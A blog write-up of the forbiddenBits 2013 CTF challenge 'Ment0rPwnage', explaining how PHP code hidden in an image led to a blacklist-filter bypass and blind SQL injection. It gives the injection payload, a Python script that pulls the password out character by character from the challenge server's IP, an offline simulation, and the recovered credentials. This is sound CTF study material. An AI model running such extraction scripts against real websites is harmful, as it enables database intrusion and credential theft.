forbiddenBits 2013 WriteUp: ment0rpwnage

March 21, 2013

Write up: Ment0rPwnage Part 1

TLDR: Downloading the wallpaper reveals hidden PHP code that is vulnerable to SQL injection. This lets us guess the username and password char by char for the login area found in robots.txt.

Ok, this challenge was a fun one; it combined a lot of different aspects of IT security. First things first: when starting the challenge one is presented with a webpage. It shows the famous quote by John Nunemaker about hackers and their green text on black terminals ;). It also features a long text that seems to carry no information relevant to the task (at least on a first skim). A quick check of robots.txt reveals a login page: 4dm1n_1337_p0rt4l. But there is no obvious way to guess a username and password. What to do now?

Looking at the long text on the front page, it is striking that it contains some glaring typos. After a quick Google search for the original text and a char-by-char comparison, the misspelled words turn out to form an anagram of “I love metadata”. Ok, this may help. But where to find metadata? The most common source of metadata are images, and there is only one image on this page: the wallpaper with the quote. After downloading it, the first thing to do was to run strings on it. And this reveals something very interesting:

  <?php
    include("config.php");
    if(isset($_GET['id'])) {
      $id = @$_GET['id'];
      $message="";
      $rm_trash = preg_replace('#\/\*.*\*\/#U','',$id);
      // written by genius don't try to understand
      if(!preg_match('#^[^0-9]#',$rm_trash)) {
        // and you thought you can inject me?haha
        if(!preg_match("#union|sub|lenght|case|convert|having|and|like|
        bench|sleep|mid|if|file|into|str|char|'|,#i", $rm_trash)){
          $req = mysql_query("SELECT * FROM users WHERE id=$rm_trash");
          if(@mysql_num_rows($req)!=0)
            $message = "Sure, we have it in database";
          else
            $message="Houston, we have a problem!";
        }
        else
          $message="Houston, we have a filter!";
      }
    }
  ?>

So the picture carries the PHP code that handles the page's id parameter. A quick test with “?id=0” gets us the “Houston, we have a problem!” message, clearly visible in the page source. We also see that the only validation of user input is a regular-expression blacklist; the value is concatenated straight into the query, so SQL injection is possible. But a lot of keywords are blocked, including “like”, which would help a lot (it is also noteworthy that LENGTH is not blocked, because the filter misspells it as “lenght”). To replace LIKE we used the POSITION function, which returns the 1-based position of the first occurrence of a substring in a string, and 0 if it does not occur. Subtracting 1 makes the OR condition false exactly when the guess is at position 1, i.e. when it is a prefix of the value; since no row has id 0, this yields the “Houston, we have a problem!” message, while any other result (-1 when the guess is absent, a positive number when it occurs later) makes the condition true and returns “Sure, we have it in database”. The string literal has to use double quotes, because single quotes are filtered. So by using a statement like this:

88.190.221.115/?id=0 or(select position("a" in p4ssword)-1 from users)

we were able to guess values char by char. This was used to first guess the names of the columns in the table (usern4me and p4ssword), then the username (teh_ment0r) and the password (ff8211a471051fd7f1be4c0b5917b860). The password could be submitted as the flag and earned us 200 points. This was the first part of the challenge.

Python script for password guessing:

import requests

# Boolean oracle: "Houston, we have a problem!" means the query matched no row,
# i.e. POSITION(prefix IN p4ssword) - 1 == 0, so the guessed prefix sits at position 1.
password = ""
abc = ["a","b","c","d","e","f","0","1","2","3","4","5","6","7","8","9"]  # the password is a 32-char hex string
for i in range(1, 33):
  for x in abc:
    # double quotes: single quotes are caught by the blacklist
    r = requests.get("http://88.190.221.115/?id=0 or (select position(\"" + password + x + "\" in p4ssword) - 1 from users)")
    txt = r.text
    print(r.url)
    if "Houston, we have a problem!" in txt:
      print(x)
      password += x
      break  # prefix confirmed, move on to the next character
print(password)
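To make the oracle reproducible offline, here is an added Python example (not code from the original write-up) that ports the two regex checks from the PHP snippet above, stands in for the MySQL backend with a one-row users table holding the recovered credentials, and runs the char-by-char extraction against it. The table contents, the `mysql_stub` emulation (which only understands a plain integer and the POSITION() payload shape used above) and the function names are assumptions. It also checks the filter behaviour described above: LIKE and single quotes are caught, LENGTH slips through because of the “lenght” typo, and comments are stripped before the blacklist runs.

```python
import re

# Constructed stand-in for the challenge's users table; only the values recovered
# in the write-up are known, so that is all it contains.
USERS = [{"id": 1, "usern4me": "teh_ment0r", "p4ssword": "ff8211a471051fd7f1be4c0b5917b860"}]

# The two checks from the PHP snippet in the wallpaper, ported to Python's re module.
COMMENT = re.compile(r"/\*.*?\*/")          # preg_replace('#\/\*.*\*\/#U', ...) (ungreedy)
BLACKLIST = re.compile(
    r"union|sub|lenght|case|convert|having|and|like|bench|sleep|mid|if|file|into|str|char|'|,",
    re.I,
)
# Shape of the payload used in the write-up; the stub below only understands this one form.
PAYLOAD = re.compile(r'^0 or \(select position\("([^"]*)" in (\w+)\) - 1 from users\)$', re.I)


def passes_filter(id_param):
    """True if the PHP gate would hand this ?id= value to mysql_query()."""
    rm_trash = COMMENT.sub("", id_param)
    if re.match(r"[^0-9]", rm_trash):       # '#^[^0-9]#': the value must start with a digit
        return False
    return BLACKLIST.search(rm_trash) is None


def mysql_stub(where_value):
    """Rows returned by SELECT * FROM users WHERE id=<where_value> (assumed emulation of
    MySQL semantics for a plain integer and for the POSITION() payload). A query error
    yields 0, matching @mysql_num_rows(false) in the PHP."""
    m = PAYLOAD.match(where_value)
    if m is None:
        try:
            return sum(1 for u in USERS if u["id"] == int(where_value))
        except ValueError:
            return 0                        # anything else: treat as a query error
    needle, column = m.group(1), m.group(2)
    value = USERS[0].get(column) if len(USERS) == 1 else None
    if not isinstance(value, str):
        return 0                            # "Subquery returns more than 1 row" / unknown column
    pos = value.find(needle) + 1            # POSITION(): 1-based, 0 when absent
    # id=0 OR (pos - 1): the OR is false only when pos - 1 == 0, i.e. the needle is a prefix
    return len(USERS) if pos - 1 != 0 else 0


def challenge_page(id_param):
    """The message the PHP snippet prints for a given ?id= value."""
    rm_trash = COMMENT.sub("", id_param)
    if re.match(r"[^0-9]", rm_trash):
        return ""                           # fails the leading-digit check: no message at all
    if BLACKLIST.search(rm_trash):
        return "Houston, we have a filter!"
    return "Sure, we have it in database" if mysql_stub(rm_trash) else "Houston, we have a problem!"


def extract(oracle, column="p4ssword", alphabet="0123456789abcdef", max_len=32):
    """Recover a column value char by char through the boolean oracle."""
    found = ""
    while len(found) < max_len:
        for ch in alphabet:
            payload = '0 or (select position("%s" in %s) - 1 from users)' % (found + ch, column)
            if "Houston, we have a problem!" in oracle(payload):
                found += ch
                break
        else:
            break                           # no character extends the prefix: value is complete
    return found


if __name__ == "__main__":
    print(extract(challenge_page))
```

Against the real target, `extract` would be handed a function that performs the HTTP request and returns the response body; the local `challenge_page` only replaces that network call. The `else` on the inner loop stops the search when no candidate extends the prefix, which is what happens when the value ends or contains a character outside the alphabet.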

2 Responses to “forbiddenBits 2013 WriteUp: ment0rpwnage”

  1. Can you upload the HTML code as well? I mean, I would like to try it soon on localhost.

  2. I’m sorry, I do not have the source for the challenge. Maybe you can try contacting the organizer of the CTF?
